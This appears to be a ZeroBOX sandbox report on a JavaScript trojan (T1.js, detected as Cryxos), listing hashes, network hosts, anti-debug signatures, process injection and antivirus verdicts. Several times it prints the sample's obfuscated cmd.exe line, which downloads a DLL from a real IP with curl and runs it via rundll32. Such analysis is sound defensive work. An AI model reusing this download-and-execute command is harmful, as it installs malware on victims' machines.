Summary | ZeroBOX

T1.js

AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 26, 2023, 10:32 a.m. Oct. 26, 2023, 10:35 a.m.
Size 412.1KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 caa023ac5ec92dd9fd17b33a448c140a
SHA256 ddb6b38b4aa2bcb0ff70e9f60324c150ef8b01bbd3a6a1037d121d9f054b815d
CRC32 EDCF07C3
ssdeep 6144:Wj38P9IwPaHP79bvi5u9r9pMrSOEa0G56iRnopvGSzjdOEDjkp9XT:cd3GQhLXdOEsp9j
Yara None matched

Name Response Post-Analysis Lookup
www.ssl.com 54.87.241.101
IP Address Status Action
155.138.224.36 Active Moloch
164.124.101.2 Active Moloch
34.195.117.81 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 'bo' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: bo
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping request could not find host bo. Please check the name and try again.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping request could not find host bo. Please check the name and try again.
console_handle: 0x00000007
1 1 0
request GET http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt
cmdline cmd.exe /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
cmdline "C:\Windows\System32\cmd.exe" /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline cmd.exe /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
cmdline ping bo
cmdline "C:\Windows\System32\cmd.exe" /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
cmdline ping -n 2 bo
host 155.138.224.36
Time & API Arguments Status Return Repeated

WSASend

buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com
socket: 960
0 0
ALYac JS:Trojan.Cryxos.13196
VIPRE JS:Trojan.Cryxos.13196
Kaspersky HEUR:Trojan.Script.Generic
BitDefender JS:Trojan.Cryxos.13196
MicroWorld-eScan JS:Trojan.Cryxos.13196
FireEye JS:Trojan.Cryxos.13196
Emsisoft JS:Trojan.Cryxos.13196 (B)
Ikarus Trojan.JS.Cryxos
Varist URL/Downldr.EB5.gen!Eldorado
Microsoft Trojan:Win32/Phonzy.C!ml
Arcabit JS:Trojan.Cryxos.D338C
GData JS:Trojan.Cryxos.13196
Google Detected
MAX malware (ai score=80)
Time & API Arguments Status Return Repeated

WSASend

buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com
socket: 960
0 0
parent_process wscript.exe martian_process cmd.exe /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c bo || EchO bo & ping bo || CurL http://155.138.224.36/abb/unsec -o %tMp%\bo.dlld & ping -n 2 bo || rundLL32 %tmP%\bo.dlld, Crash & exIt GMDeoHZtDpvO
Process injection Process 2548 resumed a thread in remote process 2692
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000004e8
suspend_count: 1
process_identifier: 2692
1 0 0
dead_host 155.138.224.36:80
file C:\Windows\System32\cmd.exe